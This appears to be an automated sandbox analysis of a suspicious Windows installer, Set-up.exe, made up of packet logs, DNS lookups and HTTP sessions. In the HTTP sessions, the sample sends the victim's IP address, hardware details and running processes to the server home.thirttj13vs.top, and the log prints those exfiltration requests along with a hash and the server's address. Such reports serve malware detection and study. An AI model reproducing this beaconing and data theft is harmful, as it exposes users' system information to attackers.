                              Jan 6, 2025 12:15:02.390186071 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.390196085 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.390212059 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.390230894 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.390249968 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.390264988 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.394397974 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.394449949 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.394469023 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.394494057 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.394517899 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.394537926 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.394546032 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.394582033 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.394670010 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.394678116 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.394707918 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.394757986 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.394818068 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.394819021 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.394866943 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.394870043 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.394880056 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.394921064 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.394965887 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.394974947 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.394998074 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395006895 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395015001 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.395040989 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.395045042 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395057917 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.395062923 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395091057 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.395106077 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.395112038 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395122051 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395163059 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.395169973 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395179987 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395231009 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.395247936 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395257950 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395298958 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.395323992 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395333052 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395349026 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395356894 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395370007 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.395379066 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395381927 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.395387888 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395405054 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.395415068 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395423889 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395428896 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.395454884 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.395464897 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.395482063 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395492077 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395523071 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395530939 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395533085 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.395555973 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395565033 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395576000 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.395602942 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395606041 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.395612955 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395634890 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395643950 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395658016 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.395664930 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395673037 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395680904 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.395688057 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395695925 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395718098 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.395731926 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395741940 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.395744085 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.395750999 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.399322033 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.399331093 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.399375916 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.399390936 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.399400949 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.399416924 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.399455070 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.399755955 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.399764061 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.399801970 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.399811029 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.399866104 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.399874926 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.399905920 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.399918079 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.399930000 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.399962902 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.399971008 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.399981022 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400008917 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400022030 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.400034904 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400049925 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.400094032 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.400130987 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400175095 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.400177956 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400224924 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.400254965 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400264978 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400279999 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400289059 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400305986 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.400329113 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.400342941 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400352001 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400367975 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400377035 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400394917 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.400413990 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.400456905 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400465965 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400504112 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400506020 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.400512934 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400544882 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.400563002 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400569916 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.400573015 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400605917 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400614023 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400614977 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.400625944 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400635004 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400654078 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.400674105 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.400698900 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400708914 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400748968 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.400791883 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400801897 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400816917 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400842905 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.400855064 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.400859118 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400904894 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.400930882 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400939941 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400954962 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400963068 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400979042 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.400985003 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.400989056 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.401012897 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.401073933 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.401082993 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.401091099 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.401108027 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.401115894 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.401133060 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.401140928 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.401149988 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.404745102 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.404761076 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.404771090 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.404820919 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.404829979 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.404846907 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.404855013 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.404891014 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.404906034 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.404942036 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.404953957 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.404963017 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.404966116 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.404970884 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.404979944 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405015945 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405020952 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.405025959 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405035973 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.405049086 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405057907 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405071974 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.405083895 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.405102015 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405107021 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.405112028 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405153036 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.405251026 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405261040 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405268908 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405277014 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405286074 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405294895 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405303001 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405303955 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.405319929 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405338049 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.405340910 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405349016 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405354977 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.405371904 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.405395031 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.405397892 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405407906 CET804973134.147.147.173192.168.2.4

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Jan 6, 2025 12:14:58.077063084 CET | 192.168.2.4 | 1.1.1.1 | 0xb359 | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false |
| Jan 6, 2025 12:14:58.077115059 CET | 192.168.2.4 | 1.1.1.1 | 0x6c88 | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false |
| Jan 6, 2025 12:15:01.056473017 CET | 192.168.2.4 | 1.1.1.1 | 0xb58d | Standard query (0) | home.thirttj13vs.top | A (IP address) | IN (0x0001) | false |
| Jan 6, 2025 12:15:01.056580067 CET | 192.168.2.4 | 1.1.1.1 | 0xff07 | Standard query (0) | home.thirttj13vs.top | 28 | IN (0x0001) | false |
| Jan 6, 2025 12:15:05.289653063 CET | 192.168.2.4 | 1.1.1.1 | 0xf61e | Standard query (0) | home.thirttj13vs.top | A (IP address) | IN (0x0001) | false |
| Jan 6, 2025 12:15:05.289716005 CET | 192.168.2.4 | 1.1.1.1 | 0x3466 | Standard query (0) | home.thirttj13vs.top | 28 | IN (0x0001) | false |
| Jan 6, 2025 12:15:05.315788984 CET | 192.168.2.4 | 1.1.1.1 | 0x3466 | Standard query (0) | home.thirttj13vs.top | 28 | IN (0x0001) | false |
| Jan 6, 2025 12:15:06.464376926 CET | 192.168.2.4 | 1.1.1.1 | 0x493e | Standard query (0) | home.thirttj13vs.top | A (IP address) | IN (0x0001) | false |
| Jan 6, 2025 12:15:06.464409113 CET | 192.168.2.4 | 1.1.1.1 | 0xed58 | Standard query (0) | home.thirttj13vs.top | 28 | IN (0x0001) | false |


| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Jan 6, 2025 12:14:58.084177017 CET | 1.1.1.1 | 192.168.2.4 | 0xb359 | No error (0) | httpbin.org | | 50.19.58.113 | A (IP address) | IN (0x0001) | false |
| Jan 6, 2025 12:14:58.084177017 CET | 1.1.1.1 | 192.168.2.4 | 0xb359 | No error (0) | httpbin.org | | 3.210.94.60 | A (IP address) | IN (0x0001) | false |
| Jan 6, 2025 12:14:58.084177017 CET | 1.1.1.1 | 192.168.2.4 | 0xb359 | No error (0) | httpbin.org | | 34.200.57.114 | A (IP address) | IN (0x0001) | false |
| Jan 6, 2025 12:14:58.084177017 CET | 1.1.1.1 | 192.168.2.4 | 0xb359 | No error (0) | httpbin.org | | 34.197.122.172 | A (IP address) | IN (0x0001) | false |
| Jan 6, 2025 12:15:01.438524008 CET | 1.1.1.1 | 192.168.2.4 | 0xb58d | No error (0) | home.thirttj13vs.top | | 34.147.147.173 | A (IP address) | IN (0x0001) | false |
| Jan 6, 2025 12:15:05.299109936 CET | 1.1.1.1 | 192.168.2.4 | 0xf61e | No error (0) | home.thirttj13vs.top | | 34.147.147.173 | A (IP address) | IN (0x0001) | false |
| Jan 6, 2025 12:15:07.261639118 CET | 1.1.1.1 | 192.168.2.4 | 0x493e | No error (0) | home.thirttj13vs.top | | 34.147.147.173 | A (IP address) | IN (0x0001) | false |

                              • httpbin.org
                              • home.thirttj13vs.top

| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.4 | 49731 | 34.147.147.173 | 80 | 6512 | C:\Users\user\Desktop\Set-up.exe |


| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Jan 6, 2025 12:15:01.929301023 CET | 12360 | OUT | POST /gbVspuhpvozlydclqfRi1736138767 HTTP/1.1 |

Host: home.thirttj13vs.top
Accept: */*
Content-Type: application/json
Content-Length: 577840
                              Data Ascii: { "ip": "8.46.123.189", "current_time": "8532915458317990705", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe" [TRUNCATED]
                              Jan 6, 2025 12:15:05.263189077 CET | 138 | IN | HTTP/1.1 200 OK
                              server: nginx/1.22.1
                              date: Mon, 06 Jan 2025 11:15:05 GMT
                              content-type: text/html; charset=utf-8
                              content-length: 1
                              Data Raw: 30
                              Data Ascii: 0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              1 | 192.168.2.4 | 49733 | 34.147.147.173 | 80 | 6512 | C:\Users\user\Desktop\Set-up.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Jan 6, 2025 12:15:05.822952986 CET | 100 | OUT | GET /gbVspuhpvozlydclqfRi1736138767?argument=0 HTTP/1.1
                              Host: home.thirttj13vs.top
                              Accept: */*
                              Jan 6, 2025 12:15:06.439994097 CET | 353 | IN | HTTP/1.1 404 NOT FOUND
                              server: nginx/1.22.1
                              date: Mon, 06 Jan 2025 11:15:06 GMT
                              content-type: text/html; charset=utf-8
                              content-length: 207
                              Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              2 | 192.168.2.4 | 49734 | 34.147.147.173 | 80 | 6512 | C:\Users\user\Desktop\Set-up.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Jan 6, 2025 12:15:07.267832041 CET | 173 | OUT | POST /gbVspuhpvozlydclqfRi1736138767 HTTP/1.1
                              Host: home.thirttj13vs.top
                              Accept: */*
                              Content-Type: application/json
                              Content-Length: 31
                              Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                              Data Ascii: { "id1": "0", "data": "Done1" }
                              Jan 6, 2025 12:15:07.976244926 CET | 353 | IN | HTTP/1.1 404 NOT FOUND
                              server: nginx/1.22.1
                              date: Mon, 06 Jan 2025 11:15:07 GMT
                              content-type: text/html; charset=utf-8
                              content-length: 207
                              Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              0 | 192.168.2.4 | 49730 | 50.19.58.113 | 443 | 6512 | C:\Users\user\Desktop\Set-up.exe
                              Timestamp | Bytes transferred | Direction | Data
                              2025-01-06 11:14:58 UTC | 52 | OUT | GET /ip HTTP/1.1
                              Host: httpbin.org
                              Accept: */*
                              2025-01-06 11:14:59 UTC | 224 | IN | HTTP/1.1 200 OK
                              Date: Mon, 06 Jan 2025 11:14:59 GMT
                              Content-Type: application/json
                              Content-Length: 31
                              Connection: close
                              Server: gunicorn/19.9.0
                              Access-Control-Allow-Origin: *
                              Access-Control-Allow-Credentials: true
                              2025-01-06 11:14:59 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                              Data Ascii: { "origin": "8.46.123.189"}


                              Target ID:0
                              Start time:06:14:56
                              Start date:06/01/2025
                              Path:C:\Users\user\Desktop\Set-up.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\Set-up.exe"
                              Imagebase:0x110000
                              File size:7'745'160 bytes
                              MD5 hash:82F12257874F42D2F2475CA1D9189E43
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                                Execution Graph

                                Execution Coverage:1.6%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:26.6%
                                Total number of Nodes:1551
                                Total number of Limit Nodes:79
65 API calls 95161 41d100 57 API calls 93457 148b50 93458 148b6b 93457->93458 93497 148be6 93457->93497 93459 148bf3 93458->93459 93460 148b8f 93458->93460 93458->93497 93498 14a550 93459->93498 93617 126e40 11 API calls 93460->93617 93464 148ba1 93466 148cd9 SleepEx getsockopt 93464->93466 93467 148c99 93464->93467 93485 148bb5 93464->93485 93465 148ccf 93470 148e85 93465->93470 93474 14a150 84 API calls 93465->93474 93465->93497 93468 148d22 93466->93468 93469 148d18 WSAGetLastError 93466->93469 93467->93466 93471 148cb2 93467->93471 93468->93465 93477 148d43 93468->93477 93469->93468 93478 148eae 93470->93478 93470->93497 93624 122a00 50 API calls 93470->93624 93471->93465 93619 14b180 SleepEx getsockopt WSAGetLastError 93471->93619 93472 148c35 WSAGetLastError 93604 14a150 93472->93604 93473 148c1f connect 93473->93472 93475 148dff WSASetLastError 93474->93475 93475->93470 93479 148e1b 93475->93479 93482 12d8c0 2 API calls 93477->93482 93478->93497 93625 1178b0 closesocket 93478->93625 93479->93470 93622 12d090 66 API calls 93479->93622 93486 148d4d 93482->93486 93484 148c8b 93484->93467 93489 148dc8 93484->93489 93493 148d66 93485->93493 93485->93497 93488 14a150 84 API calls 93486->93488 93488->93493 93621 14b100 68 API calls 93489->93621 93490 148e67 93623 154fd0 51 API calls 93490->93623 93493->93497 93620 1550a0 51 API calls 93493->93620 93499 12d8c0 2 API calls 93498->93499 93500 14a575 93499->93500 93502 14a597 93500->93502 93630 1175e0 93500->93630 93601 14a6d9 93502->93601 93643 14ef30 93502->93643 93503 14a709 93506 1178b0 51 API calls 93503->93506 93523 14a713 93503->93523 93505 14a63a 93509 14a641 93505->93509 93510 14a69b _errno _errno _errno 93505->93510 93506->93523 93507 148bfc 93507->93465 93507->93472 93507->93473 93507->93497 93511 14a650 setsockopt 93509->93511 93513 14a683 93509->93513 93656 12d090 66 API calls 93510->93656 93511->93513 93514 14a7e5 93511->93514 93513->93514 93660 154fd0 51 API calls 93513->93660 93518 14a802 93514->93518 
93519 14a8ee 93514->93519 93515 14a6c9 93657 154f40 52 API calls 93515->93657 93521 14a811 setsockopt 93518->93521 93522 14a87c 93518->93522 93525 14a962 getsockopt 93519->93525 93526 14a92a 93519->93526 93550 14a9ac 93519->93550 93521->93522 93524 14a83b 93521->93524 93527 14ac6a 93522->93527 93531 14ac20 getsockopt 93522->93531 93532 14a8b9 93522->93532 93523->93507 93659 1550a0 51 API calls 93523->93659 93524->93522 93533 14a854 WSAGetLastError 93524->93533 93529 14a984 93525->93529 93530 14a991 setsockopt 93525->93530 93664 137620 11 API calls 93526->93664 93527->93550 93665 14b1e0 58 API calls 93527->93665 93529->93530 93529->93550 93530->93550 93535 14ac42 93531->93535 93536 14ac4f setsockopt 93531->93536 93663 137620 11 API calls 93532->93663 93661 12d090 66 API calls 93533->93661 93534 14a945 93534->93525 93539 14a94c 93534->93539 93535->93527 93535->93536 93536->93527 93539->93550 93541 14af41 93655 1767e0 ioctlsocket 93541->93655 93542 14a8d4 93542->93531 93545 14a8df 93542->93545 93543 14a86d 93662 154fd0 51 API calls 93543->93662 93545->93527 93547 14af56 93548 14af5d 93547->93548 93549 14afb9 WSAGetLastError 93547->93549 93548->93523 93553 14a150 84 API calls 93548->93553 93549->93601 93550->93541 93551 14abe1 93550->93551 93552 14ab0a strlen 93550->93552 93550->93601 93554 14aed3 htons 93551->93554 93555 14abee 93551->93555 93552->93551 93561 14ab22 93552->93561 93556 14af8f 93553->93556 93557 14aeeb bind 93554->93557 93555->93557 93558 14abf9 htons 93555->93558 93559 12d8c0 2 API calls 93556->93559 93568 14af03 93557->93568 93569 14afcf 93557->93569 93560 14ac0c 93558->93560 93559->93523 93560->93557 93562 14ae32 93561->93562 93563 14acb8 93561->93563 93565 14abb9 93561->93565 93562->93565 93673 154fd0 51 API calls 93562->93673 93563->93565 93577 14acdc WSAGetLastError 93563->93577 93563->93601 93564 14af33 93564->93541 93572 14adc5 93565->93572 93573 14ad45 93565->93573 93580 14adea WSAGetLastError 93565->93580 93667 146be0 164 API calls 
